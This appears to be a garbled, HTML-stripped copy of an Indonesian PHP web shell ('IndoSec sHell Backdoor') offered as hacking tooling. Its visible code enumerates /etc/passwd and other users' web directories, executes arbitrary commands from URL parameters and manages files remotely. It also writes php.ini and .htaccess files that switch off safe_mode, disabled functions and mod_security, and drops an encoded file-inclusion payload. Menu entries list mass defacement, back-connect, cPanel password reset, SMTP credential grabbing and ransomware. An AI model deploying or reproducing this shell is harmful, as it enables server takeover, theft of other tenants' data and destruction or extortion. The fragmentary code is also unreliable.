{ IndoSec sHell }

"; foreach($urls as $url){ $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)){ $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true){ $url_user = $dir_user."/".$url; if(is_readable($url_user)){ $i++; $jrw = "[R] $url_user"; if(is_writable($url_user)){ $jrw = "[RW] $url_user"; } echo $jrw."
"; } } } } if(!$i == 0){ echo "
Total ada $i KAMAR di $ip"; } echo "

"; foreach($urls as $url){ $web_vh = "/var/www/vhosts/$url/httpdocs"; if(is_dir($web_vh) === true){ if(is_readable($web_vh)){ $i++; $jrw = "[R] $web_vh"; if(is_writable($web_vh)){ $jrw = "[RW] $web_vh"; } echo $jrw."
"; } } } if(!$i == 0){ echo "
Total ada $i Kamar Di $ip"; } echo "

"; $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd
"); while($passwd = fgets($etc)){ if($passwd == '' || !$etc){ echo "Can't read /etc/passwd
"; }else{ preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_pro_jump){ $user_jumping_dir = "/home/$user_pro_jump/public_html"; if(is_readable($user_jumping_dir)){ $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)){ $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')){ $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == ''){ echo " => ( gabisa ambil nama domain nya )
"; }else{ preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj){ $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_pro_jump){ echo " => ( $dj )
"; break; } } } }else{ echo "
"; } } } } } if(!$i == 0){ echo "
Total ada $i kamar di $ip"; } echo "

'; $mail = 'ls /var/mail'; $paswd = '/etc/passwd'; if($_POST['syst']){ echo"
"; } if($_POST['passth']){ echo"
"; } if($_POST['ex']){ echo"
"; } if($_POST['shex']){ echo"
"; } if($_POST['melex']){ echo"
"; } if ($_POST['awkuser']){ echo"
"; } if ($_POST['systuser']){ echo"
"; } if ($_POST['passthuser']){ echo"
"; } if ($_POST['exuser']){ echo"
"; } if ($_POST['shexuser']){ echo"
"; } echo "

No.	Domains	Users	symlink
".$dcount."	".$domains[1][0]."	".$user['name']."	Symlink

No.

Domains

Users

symlink

".$dcount."

".$domains[1][0]."

".$user['name']."

Symlink

No.

Users

symlink

".$dcount."

".$matches."

Symlink

"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++){ $uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n"; } echo '
';$temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; $dcount++; } fclose($file); echo "

ID.	Users	symlink
".$dcount."	".$matches."	Symlink

Symlink 404

Users	symlink	FTP
$user	Symlink	FTP

Users

symlink

FTP

$user

Symlink

FTP

Back Connect Tools

Bypass Disable Functions

"; if(isset($_POST['ini'])){ $file = fopen("php.ini","w"); echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE"); fclose($file); echo "Klik Coeg!"; }elseif(isset($_POST['htce'])){ $file = fopen(".htaccess","w"); echo fwrite($file,"\nSecFilterEngine Off\nSecFilterScanPOST Off\n"); fclose($file); echo "

.htaccess successfully created!

"; }elseif(isset($_POST['litini'])){ $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg=="; $byph = "safe_mode = OFF\ndisable_functions = NONE"; $comp = "\nForceType application/x-httpd-php4\n"; file_put_contents("php.ini",$byph); file_put_contents("ini.php",$iniph); file_put_contents(".htaccess",$comp); $swa = "success"; $text = "Disable Functions in Litespeed Created"; swall($swa,$text,$dir); } echo "

Auto Reset Password Cpanel

Auto Edit User

NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

NB : Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/namafolder_config )

{ INDOSEC }

Terminal :

Informasi :

PHP	: '.$ver.'
IP Server	: '.$ip.'
HDD	Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]
Domain	: '.$dom.'
MySQL	: '.$mysql.'
cURL	: '.$curl.'
Mailer	: '.$mail.'
Disable Function	: '.$show_ds.'
Software	: '.$sof.'
Sistem Operasi	: '.$os.'

'; //keluar if (isset($_GET['keluar'])){ session_start(); session_destroy(); echo ''; } //cmd if(isset($_GET['cmd'])){ echo "

".exe($_GET['cmd'])."

"; exit; } //about if (isset($_GET['about'])){ about(); } //upload if ($_GET['aksi'] == 'upload'){ aksiUpload($dir); } //openfile if (isset($_GET['file'])){ $file = $_GET['file']; } $nfile = basename($file); //chmod if($_GET['aksi'] == 'chmod_file'){ chmodFile($dir,$file,$nfile); } //buat_file if ($_GET['aksi'] == 'buat_file'){ buatFile($dir,$imgfile); } //view if($_GET['aksi'] == 'view'){ view($dir,$file,$nfile,$imgfile); } //edit if($_GET['aksi'] == 'edit'){ editFile($dir,$file,$nfile,$imgfile); } //rename if($_GET['aksi'] == 'rename'){ renameFile($dir,$file,$nfile,$imgfile); } //Delete File if ($_GET['aksi'] == 'hapusf'){ hapusFile($dir,$file,$nfile); } $ndir = basename($dir); //chmod if($_GET['aksi'] == 'chmod_dir'){ chmodFolder($dir,$ndir); } //Add Folder if ($_GET['aksi'] == 'buat_folder' ){ buatFolder($dir,$imgfol); } //Rename Folder if ($_GET['aksi'] == 'rename_folder' ){ renameFolder($dir,$ndir,$imgfol); } //Delete Folder if ($_GET['aksi'] == 'hapus_folder' ){ deleteFolder($dir,$ndir); } /* * Fungsi_Tambahan * * * Mass Deface * IndoXploit */ if($_GET['aksi'] == 'masdef'){ aksiMasdef($dir,$file,$imgfol,$imgfile); } /* * mass delete * IndoXploit */ if($_GET['aksi'] == 'masdel'){ aksiMasdel($dir,$file,$imgfol,$imgfile); } /* * Jumping * IndoXploit */ if($_GET['aksi'] == 'jumping'){ aksiJump($dir,$file,$ip); } //Config if($_GET['aksi'] == 'config'){ aksiConfig($dir,$file); } //Bypass etc/passwd if($_GET['aksi'] == 'passwbypass'){ aksiBypasswd($dir,$file); } //Adminer if($_GET['aksi'] == 'adminer'){ aksiAdminer($dir,$file); } /* * Symlink * Kuda Shell */ if($_GET['aksi'] == 'symlink'){ aksiSym($dir,$file); } if($_GET['aksi'] == 'symread'){ aksiSymread($dir,$file); } if ($_GET['aksi'] == 'sym_404'){ sym404($dir,$file); } if ($_GET['aksi'] == 'sym_bypas'){ symBypass($dir,$file); } /* * Back Connect * Kuda Shell */ if($_GET['aksi'] == 'bctools'){ bcTool($dir,$file); } /* * Bypass Disable Function * Kuda Shell */ if($_GET['aksi'] == 'disabfunc'){ disabFunc($dir,$file); } /* * Auto Reset Cpanel * IndoSec -Fauzan- */ if ($_GET['aksi'] == 'resetpasscp'){ resetCp($dir); } /* * Auto Edit User * IndoXploit */ if($_GET['aksi'] == 'auteduser'){ autoEdit($dir,$file); } /* * Ransomware * IndoSec */ if ($_GET['aksi'] == 'ransom'){ ransom($dir,$file); } /* * SMTP Grabber * IndoXploit */ if ($_GET['aksi'] == 'smtpgrab'){ scj($dir); } //Bypass Cloud Flare if ($_GET['aksi'] == 'bypascf'){ bypasscf(); } /* * Zip Menu * IndoSec -Rizsyard- */ if($_GET['aksi'] == 'zip_menu'){ zipMenu($dir,$file); } if(isset($_GET['path'])){ $path = $_GET['path']; chdir($path); }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); echo "Path : "; foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } $scandir = scandir($path); echo " [ ".w($dir, perms($dir))." ]"; echo '

'; foreach($scandir as $dir){ $dtime = date("d/m/y G:i", filemtime("$dir/$dirx")); /* cek jika ini berbentuk folder */ /* cek jika nama folder karaker terlalu panjang */ if (strlen($dir) > 18){ $_dir = substr($dir, 0, 18)."..."; }else{ $_dir = $dir; } $_diir = $_dir; if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } foreach($scandir as $file){ $ftime = date("d/m/y G:i", filemtime("$path/$file")); /* cek jika ini berbentuk file */ if(!is_file($path.'/'.$file)) continue; echo ''; } echo '

File/folder	Size	Last Modified	Permission	Action
'.$imgfol.' '.$_diir.'	--	'.$dtime.'	'; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) \|\| !is_readable($path.'/'.$dir)) echo '
'; /* cek jika karaker terlalu panjang */ if (strlen($file) > 25){ $_file = substr($file, 0, 25)."...-.".$ext; }else{ $_file = $file; } echo' '.$_file.'	'.formatSize(filesize($file)).'	'.$ftime.'	'; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) \|\| !is_readable($path.'/'.$file)) echo '

{ INDOSEC }

sHell Backdoor

{ IndoSec }

Chmod File : $nfile

$imgfile Buat File :

'.$imgfile.' Lihat File : '.$nfile.'

$imgfile Edit File : $nfile

$imgfile Rename File : $nfile

Chmod Folder : $ndir

$imgfol Buat Folder :

$imgfol Rename Folder : $ndir

Tipe :

$imgfol Lokasi :

$imgfile Nama File :

$imgfile Isi File :

$imgfol Lokasi :

$imgfile Nama File :

Symlink 404

Back Connect Tools

Back-Connect

Bypass Disable Functions

Auto Reset Password Cpanel

Auto Edit User

Lokasi Dir Config

Set User & Pass :

Ransomware

Bypass Cloud Flare

Zip Menu

Zip Backup

Unzip Manual

{ INDOSEC }

Shell Backdoor

Terminal :

Informasi :